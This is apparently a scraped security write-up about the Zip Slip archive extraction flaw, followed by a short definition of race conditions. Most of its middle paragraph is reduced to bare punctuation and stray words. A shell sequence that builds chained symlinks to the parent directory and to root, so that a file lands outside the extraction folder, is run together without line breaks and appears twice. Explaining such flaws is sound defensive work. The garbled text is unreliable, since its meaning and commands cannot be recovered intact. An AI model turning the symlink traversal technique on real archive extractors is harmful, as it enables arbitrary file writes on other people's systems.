Zip Slip is a widespread critical archive decompression vulnerability that allows attackers to write arbitrary files to the system, which usually leads to remote execution of commands. It was discovered and disclosed by the Snyk Security team in anticipation of a public disclosure on June 5, 2018 and affected thousands of projects, including HP, Amazon, Apache, Pivotal and many others.
Race Condition (note, Race condition), also competition is a design error of a multi-threaded system or application, in which the operation of the system or application depends on the order in which parts of the code are executed.
, « » .zip-, yauzl , «..»., , . . , , ., , . / , . . - :mkdir generic_dirln -s ../ generic_dir/symlink_to_parent_dirln -s / symlink_to_roottouch generic_dir/symlink_to_parent_dir/generic_dir/symlink_to_parent_dir/[...]/symlink_to_root/tmp/slipped_zip.txt!
mkdir generic_dirln -s ../ generic_dir/symlink_to_parent_dirln -s / symlink_to_roottouch generic_dir/symlink_to_parent_dir/generic_dir/symlink_to_parent_dir/[...]/symlink_to_root/tmp/slipped_zip.txt